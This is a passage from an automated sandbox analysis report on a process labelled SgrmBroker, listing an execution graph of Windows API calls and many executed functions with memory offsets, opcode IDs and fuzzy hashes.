                                      execution_graph 11764 7ffd348aa397 11765 7ffd348aa39c 11764->11765 11768 7ffd348a9fb0 11765->11768 11767 7ffd348aa400 11769 7ffd348a9fb9 CreateFileTransactedW 11768->11769 11771 7ffd348abba8 11769->11771 11771->11767 11772 7ffd348ada35 11773 7ffd348adaa1 VirtualAlloc 11772->11773 11775 7ffd348adb7f 11773->11775 11776 7ffd348abc35 11777 7ffd348abc5f WriteFile 11776->11777 11779 7ffd348abdcf 11777->11779 11784 7ffd348a9ebd 11785 7ffd3490ff20 11784->11785 11788 7ffd3490f110 11785->11788 11787 7ffd34910009 11789 7ffd3490f11b 11788->11789 11790 7ffd3490f1be 11789->11790 11792 7ffd3490f1d7 11789->11792 11790->11787 11793 7ffd3490f1e2 11792->11793 11794 7ffd3490f22a ResumeThread 11792->11794 11793->11790 11796 7ffd3490f2f4 11794->11796 11796->11790 11780 7ffd348ad5d1 11781 7ffd348ad5ed GetSystemInfo 11780->11781 11783 7ffd348ad6c5 11781->11783

                                      Executed Functions

                                      Function 00007FFD34A80AED Relevance: .9, Instructions: 944COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: af6b64b0d1db71fcd8d030eb44bca043d659b66effc945140228c974dc6ad3e6
                                      • Instruction ID: b24cdc89c3612b2eb9c85a9e7a1f50edf03b05ba63ce235c5f677c6c86742919
                                      • Opcode Fuzzy Hash: af6b64b0d1db71fcd8d030eb44bca043d659b66effc945140228c974dc6ad3e6
                                      • Instruction Fuzzy Hash: 0C723C70E09A1D8FEBE4EF18C8A56A977B1FF59305F1001B9D50DE3291DE786A819F40
                                      Function 00007FFD348AB98A Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1770 7ffd348ab98a-7ffd348ab997 1771 7ffd348ab999-7ffd348ab9a1 1770->1771 1772 7ffd348ab9a2-7ffd348aba68 1770->1772 1771->1772 1775 7ffd348aba6a-7ffd348aba81 1772->1775 1776 7ffd348aba84-7ffd348abba6 CreateFileTransactedW 1772->1776 1775->1776 1777 7ffd348abba8 1776->1777 1778 7ffd348abbae-7ffd348abc30 1776->1778 1777->1778
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 00577af65a166b54f819bc79fdcdfbcb7345f317fe7c833b6fce971f25fde15a
                                      • Instruction ID: 74619530a7c2c77baf346bf19cd7d8aca72e934441990cc99fe3d342618ffb43
                                      • Opcode Fuzzy Hash: 00577af65a166b54f819bc79fdcdfbcb7345f317fe7c833b6fce971f25fde15a
                                      • Instruction Fuzzy Hash: 32912070908A5C8FDB99DF58C894BE9BBF1FB6A310F1011AED04DE3291DB75A984CB04
                                      Function 00007FFD348A9FB0 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1781 7ffd348a9fb0-7ffd348aba68 1786 7ffd348aba6a-7ffd348aba81 1781->1786 1787 7ffd348aba84-7ffd348abba6 CreateFileTransactedW 1781->1787 1786->1787 1788 7ffd348abba8 1787->1788 1789 7ffd348abbae-7ffd348abc30 1787->1789 1788->1789
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f677c4301ed21c578fa83f09c8344a1fdde67973c2b1906e6221d610d39472f0
                                      • Instruction ID: 3d345864311e469bb3a186a2cef8fe935434d7d15eea2b021b3afdb1c8a68adc
                                      • Opcode Fuzzy Hash: f677c4301ed21c578fa83f09c8344a1fdde67973c2b1906e6221d610d39472f0
                                      • Instruction Fuzzy Hash: 6E81E070A08A1C8FDB98DF58C894BA9BBF1FB69310F1051AED04EE3251DB75A981CF44
                                      Function 00007FFD348ABC35 Relevance: 1.7, APIs: 1, Instructions: 218fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1792 7ffd348abc35-7ffd348abd02 1796 7ffd348abd2a-7ffd348abdcd WriteFile 1792->1796 1797 7ffd348abd04-7ffd348abd27 1792->1797 1798 7ffd348abdd5-7ffd348abe31 1796->1798 1799 7ffd348abdcf 1796->1799 1797->1796 1799->1798
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 5ae0bbb22588e0bf56d446800c07ad0bb0ae1c2c4b2ec7a4c1364a37b1addb0d
                                      • Instruction ID: 7b2374de3cb0807b0a22fb41ca520c31a8c80c756a8921a13222130f296e9567
                                      • Opcode Fuzzy Hash: 5ae0bbb22588e0bf56d446800c07ad0bb0ae1c2c4b2ec7a4c1364a37b1addb0d
                                      • Instruction Fuzzy Hash: 22610570A08A5C8FDB98DF58C895BE9BBF1FB6A311F1041AED04DE3251DB74A985CB40
                                      Function 00007FFD348AD59A Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1801 7ffd348ad59a-7ffd348ad5a3 1802 7ffd348ad5a5-7ffd348ad5cf 1801->1802 1803 7ffd348ad5ed 1801->1803 1805 7ffd348ad5ef 1803->1805 1806 7ffd348ad5f0-7ffd348ad65a 1803->1806 1805->1806 1809 7ffd348ad662-7ffd348ad6c3 GetSystemInfo 1806->1809 1810 7ffd348ad6c5 1809->1810 1811 7ffd348ad6cb-7ffd348ad6fb 1809->1811 1810->1811
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 1acb3c4a30810f1daaa07c613428d139de7c119284ea86cdd6cfef25a537397d
                                      • Instruction ID: 9edeabf94d86052a0aa14bc56760972846c6e52ec93e2fb9cc9b62ab831846a7
                                      • Opcode Fuzzy Hash: 1acb3c4a30810f1daaa07c613428d139de7c119284ea86cdd6cfef25a537397d
                                      • Instruction Fuzzy Hash: 1A41C071A08A4C8FDB98EF98D898BEDBBF1FF56314F04416AD00DD7252DA74A846CB50
                                      Function 00007FFD3490F1D7 Relevance: 1.6, APIs: 1, Instructions: 150threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1814 7ffd3490f1d7-7ffd3490f1e0 1815 7ffd3490f1e2-7ffd3490f202 1814->1815 1816 7ffd3490f22a-7ffd3490f2f2 ResumeThread 1814->1816 1820 7ffd3490f2f4 1816->1820 1821 7ffd3490f2fa-7ffd3490f344 1816->1821 1820->1821
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 69a3f8db2f494b2d6160ba5e5318e3f0f2d69d37ec0b5858291707da76db5c18
                                      • Instruction ID: ca4ac02666fd40f5b6d83ebadaa2d4a5d7757c39e6ac1e9ec04e8fcc314461d3
                                      • Opcode Fuzzy Hash: 69a3f8db2f494b2d6160ba5e5318e3f0f2d69d37ec0b5858291707da76db5c18
                                      • Instruction Fuzzy Hash: AE413974E0860C8FDB58EF98D894AEDBBF0FB5A310F10416ED40DE7251DA75A946CB50
                                      Function 00007FFD348AD5D1 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 835a68cf31ac7013327ebd1b1f92e15ccb0e7ac9e9efe2afbe58ec6921c436f0
                                      • Instruction ID: f16bbd0a1ee37553df192973465b19abed690495b32c41248267de34a1034fe0
                                      • Opcode Fuzzy Hash: 835a68cf31ac7013327ebd1b1f92e15ccb0e7ac9e9efe2afbe58ec6921c436f0
                                      • Instruction Fuzzy Hash: 4141A27090C68C8FDB99DFA8D859BE9BBF1EF56310F0441ABD04DD7252CA745846CB50
                                      Function 00007FFD348ADA35 Relevance: 1.4, APIs: 1, Instructions: 192memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2485982448.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd348a0000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 756aac56db2800ebd372e364dcf1d3e4bfb65fef0c062d0fee99254660074583
                                      • Instruction ID: 942f0de77e0a5888aae61e11d56e0cbc1609f8b74af386b59b1a3b0043f05bdd
                                      • Opcode Fuzzy Hash: 756aac56db2800ebd372e364dcf1d3e4bfb65fef0c062d0fee99254660074583
                                      • Instruction Fuzzy Hash: 92512A70908A5C8FDF98DF58C895BE9BBF1FB6A314F1042AAD04DE3251DB70A985CB41
                                      Function 00007FFD34A85E8B Relevance: .9, Instructions: 922COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b3cd0ecdad55802421014f04c06d865345217151851feb6063904d031bb9429
                                      • Instruction ID: ba69cc8cbb032e229913bc9b71cf51efeced0e5a094e62fc85dba6b92a7935c8
                                      • Opcode Fuzzy Hash: 4b3cd0ecdad55802421014f04c06d865345217151851feb6063904d031bb9429
                                      • Instruction Fuzzy Hash: 4771B171E0D64D8FEB94DBA8D8A46BC7BF1FF56301F1400BAD409D7292CA79A841DB40
                                      Function 00007FFD34A8640D Relevance: .6, Instructions: 577COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 565dc3755473e43ec7ac9f0ca0589c522366034b0ea65aee52c37db3846bcfdf
                                      • Instruction ID: 8a9f4e70c777269428b9ed41fe19ac292efda22d20072cd4992e05664e52adf3
                                      • Opcode Fuzzy Hash: 565dc3755473e43ec7ac9f0ca0589c522366034b0ea65aee52c37db3846bcfdf
                                      • Instruction Fuzzy Hash: 6312B670A1865D8FEB94EF68C8A56EDBBF1FF59304F10017AD40DE3292CA79A945CB40
                                      Function 00007FFD34A86470 Relevance: .5, Instructions: 507COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 576030a31099b474aed62b3218619556dfe9f2bbe64ada234c2e3b484a38b35c
                                      • Instruction ID: 62da93464db2cae52b3d6ec752b14d41920f46a9fe95bac2a44abe820ccf308d
                                      • Opcode Fuzzy Hash: 576030a31099b474aed62b3218619556dfe9f2bbe64ada234c2e3b484a38b35c
                                      • Instruction Fuzzy Hash: C9F1D571A1865D8FEB94EF68C8A56FDBBF1FF59304F10017AD409D3292CA39A945CB80
                                      Function 00007FFD34A8654E Relevance: .5, Instructions: 502COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e653f4a4dc5d53e5e55ac44cf22853233f5b689713174f2e6f5133a8c42eafaa
                                      • Instruction ID: 083969e410785f719d0e192b4e2aba1d9e1efd0c5391db499830fdc5a6115e0b
                                      • Opcode Fuzzy Hash: e653f4a4dc5d53e5e55ac44cf22853233f5b689713174f2e6f5133a8c42eafaa
                                      • Instruction Fuzzy Hash: 50F1D671A1865D8FEB94EF68C8A56EDBBF1FF59304F10017AD40DE3292CA79A941CB40
                                      Function 00007FFD34A864EA Relevance: .5, Instructions: 496COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da10127fc545f889c7e89b31983400f6da40004a929c356d6ab68cb0cdeef8ad
                                      • Instruction ID: 135cbc2c00e8a8901937738f949a9a893bf75340bfc33c9c79641649135bc981
                                      • Opcode Fuzzy Hash: da10127fc545f889c7e89b31983400f6da40004a929c356d6ab68cb0cdeef8ad
                                      • Instruction Fuzzy Hash: E6F1C570A1865D8FEB94EF68C8A56EDBBF1FF59300F14017AD409D3292CA796941CB40
                                      Function 00007FFD34A86678 Relevance: .4, Instructions: 373COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 815feba3a139811951d737ee10c693ab30c0447d3fe71bd8da487f64e4433f6c
                                      • Instruction ID: 2db62aa267cd488c97eea9bd86140ce155906ac715a39e9691fc69f978a638c9
                                      • Opcode Fuzzy Hash: 815feba3a139811951d737ee10c693ab30c0447d3fe71bd8da487f64e4433f6c
                                      • Instruction Fuzzy Hash: 25C1A370A1865D8FEB94EFA8C4A57EDBBB1FF59300F10057AD40DE3292CA79A841CB40
                                      Function 00007FFD34A84ED1 Relevance: .3, Instructions: 347COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1dfff1ae277fa7f129cb4bfe02e61d1314057370ae1508c8d960baf735c9b64b
                                      • Instruction ID: 2cb37bca0caf0e2327647722237edd1b8cdc48968bf19381fa3765185227380e
                                      • Opcode Fuzzy Hash: 1dfff1ae277fa7f129cb4bfe02e61d1314057370ae1508c8d960baf735c9b64b
                                      • Instruction Fuzzy Hash: 53C1B670A08A6D8FDBE4EF18D8A57E8B7B1FB59305F5001EAD40DE3291DA75A980DF40
                                      Function 00007FFD34A823B5 Relevance: .3, Instructions: 317COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bdd6a0b098c9415e4b56af11af249c9fb9eaab8091d8d13c0ab49bfb3c9aff5d
                                      • Instruction ID: 529abacc99ff91dc5f0a4df50f23345ccfe1c7e2b385bec4d527bf4f35b0efaa
                                      • Opcode Fuzzy Hash: bdd6a0b098c9415e4b56af11af249c9fb9eaab8091d8d13c0ab49bfb3c9aff5d
                                      • Instruction Fuzzy Hash: 67A10772E0DA894FEB94DF68D8A46F97FE0FF56314F1400BAD548D7193CA28A805D750
                                      Function 00007FFD34A82400 Relevance: .3, Instructions: 268COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 27a138ac6468562cc451175d1ab3ef2c62e11bda36dd7411825cbd48f53e4386
                                      • Instruction ID: daaea86f00302657682fb4b34083920836f4f7648ce4f0417884b940270580be
                                      • Opcode Fuzzy Hash: 27a138ac6468562cc451175d1ab3ef2c62e11bda36dd7411825cbd48f53e4386
                                      • Instruction Fuzzy Hash: 5D81B572A0DA8D8FEB94DF58D8646F97BE1FF5A304F1800BAD458D7297CA38A841C750
                                      Function 00007FFD34A848DD Relevance: .2, Instructions: 200COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c34afb02253f4150e490f80bdf7381d72379848276fc42f7c45070f9f035bd1
                                      • Instruction ID: 64081eb4601fc10a2bb0b1ca7a0bcc50abe379055447dba6f7d5748fc76b55ef
                                      • Opcode Fuzzy Hash: 3c34afb02253f4150e490f80bdf7381d72379848276fc42f7c45070f9f035bd1
                                      • Instruction Fuzzy Hash: BD61D030A1C68D8FDB95DF68C8A46E97BF0FF1A300F0401BAE448D7192DB78A954CB81
                                      Function 00007FFD34A81A05 Relevance: .2, Instructions: 193COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b889c52d80a001d59de201a10629492b42886b95c829e9be81659e65bc80ef46
                                      • Instruction ID: e6b55fcb62412e3a637036c4cf279b515bf36b456457faf669fc1e5c6ae1dcad
                                      • Opcode Fuzzy Hash: b889c52d80a001d59de201a10629492b42886b95c829e9be81659e65bc80ef46
                                      • Instruction Fuzzy Hash: 5A61DD70A08A5D8FDF94DF58C894BE97BB1FFA9311F144266D40DE3255CB34A885CB80
                                      Function 00007FFD34A80E9A Relevance: .2, Instructions: 173COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ef8ee4a14c9754e052f858d4b8e31e9138884af00129f6a3549ec5bbac68a26e
                                      • Instruction ID: 08acab5e138a2cb1e4e245c00bed9a5a1d4cde1cc3b8a43447f61eaa9964d6da
                                      • Opcode Fuzzy Hash: ef8ee4a14c9754e052f858d4b8e31e9138884af00129f6a3549ec5bbac68a26e
                                      • Instruction Fuzzy Hash: A6610B70E0961D8FEBA4EB58C8E9AA9B7B1EF55305F1001B9D40DE32A1DF386D859F40
                                      Function 00007FFD34A82995 Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb840f6545629c1226c50cc2efa3ada5a7a871056e0248278a1b0d7e3eb6bdd9
                                      • Instruction ID: cc861cddc22032e2b59faad517fe10e8883a7b9f9e7a22d3a5645ffb1c6703f8
                                      • Opcode Fuzzy Hash: fb840f6545629c1226c50cc2efa3ada5a7a871056e0248278a1b0d7e3eb6bdd9
                                      • Instruction Fuzzy Hash: 5551A131A0868D8FDBA5DF54C891AF9BBF0FF5A304F5401EAD44DD7182CA38A956CB81
                                      Function 00007FFD34A84940 Relevance: .2, Instructions: 161COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e7aa1ec2f278404ea7f7472f3f26cc391730ad16aa2e1b79b0e4d017b59d1eed
                                      • Instruction ID: 4f1377c84171039e79a7840a36884f2e1493269a0feac770ad65352fe82d70b7
                                      • Opcode Fuzzy Hash: e7aa1ec2f278404ea7f7472f3f26cc391730ad16aa2e1b79b0e4d017b59d1eed
                                      • Instruction Fuzzy Hash: E251B131A1865E8FDB94DF58C8A46FABBF0FF59300F1405BAE418D3192DB78A954CB80
                                      Function 00007FFD34A80EB9 Relevance: .2, Instructions: 153COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 62fcbcc85e1c3c5e3087f5ceacf8634586a1b09f0a53ef827632ce3c7af0337c
                                      • Instruction ID: e479a6dec4d73e660284ea729fa14dc41d1f105980bd26592047dd5428f1d93f
                                      • Opcode Fuzzy Hash: 62fcbcc85e1c3c5e3087f5ceacf8634586a1b09f0a53ef827632ce3c7af0337c
                                      • Instruction Fuzzy Hash: 30517570A55A2D8FEBA4EB58C8D9AA9B7B1FF59301F1001A9D40DE3261DF74AD81CF40
                                      Function 00007FFD34A82B15 Relevance: .1, Instructions: 142COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f03f570397dce20a5864fd4c8b26e377f7c57c629aed53d7b914bb2901939612
                                      • Instruction ID: 331bb809e388d5d0f81f193a4eb73e219395a781b03031f370df5d13224a79ea
                                      • Opcode Fuzzy Hash: f03f570397dce20a5864fd4c8b26e377f7c57c629aed53d7b914bb2901939612
                                      • Instruction Fuzzy Hash: 3141B231A1DA5D8FDB81EF58D8A56FD7BF0FF5A310F0401BAD509E3292CA695841C790
                                      Function 00007FFD34A85203 Relevance: .1, Instructions: 138COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b9a8b86084a49321f57ffd6024d49bd62bbf471477a8b87194fb736de751682e
                                      • Instruction ID: f3a50cd82cba2f14c33859ff5099bab692803a023b8727e5d0dbfcf100790d51
                                      • Opcode Fuzzy Hash: b9a8b86084a49321f57ffd6024d49bd62bbf471477a8b87194fb736de751682e
                                      • Instruction Fuzzy Hash: CE519130A1892D8FDBE4EB18C8A5BE8B7B1FB69301F5044E9950DE3251DA74AD80CF40
                                      Function 00007FFD34A86A5D Relevance: .1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fef91281c957f7f34b812111ec1b620bc9e0174befd08ea56d4bbde4bc40d30e
                                      • Instruction ID: fbde760bc90eb789c796352e241beed74123c840bfe4beb95b5f8c18927d75c0
                                      • Opcode Fuzzy Hash: fef91281c957f7f34b812111ec1b620bc9e0174befd08ea56d4bbde4bc40d30e
                                      • Instruction Fuzzy Hash: AD416870E5894D8FEB91EBA8D8A56EDBBB1FF4A305F540076D10CE3192CA7869818B01
                                      Function 00007FFD34A871E1 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e2d144e65604c554f6fe6f4c601cfe745f51657e56fdfd50306b00ddec9736cf
                                      • Instruction ID: ea3ef18a72c400cf00aab13cee1baa1eceefaefb2cb51efd0195d79f38ab5925
                                      • Opcode Fuzzy Hash: e2d144e65604c554f6fe6f4c601cfe745f51657e56fdfd50306b00ddec9736cf
                                      • Instruction Fuzzy Hash: 0231B235E0965D8FDB81DB68C8506EDBFF0FF1A311F0411B6E049E7192DA389955C711
                                      Function 00007FFD34A84AD5 Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.2486936710.00007FFD34A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_7ffd34a80000_SgrmBroker.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a969a4ea86be390247676901235c853eb355b4180fcffb16bdd5823d25666edf
                                      • Instruction ID: 17bc5508baddc4909cd984e2284a0d7804253e9d95aea49b9fcf2ea1cdc42783
                                      • Opcode Fuzzy Hash: a969a4ea86be390247676901235c853eb355b4180fcffb16bdd5823d25666edf
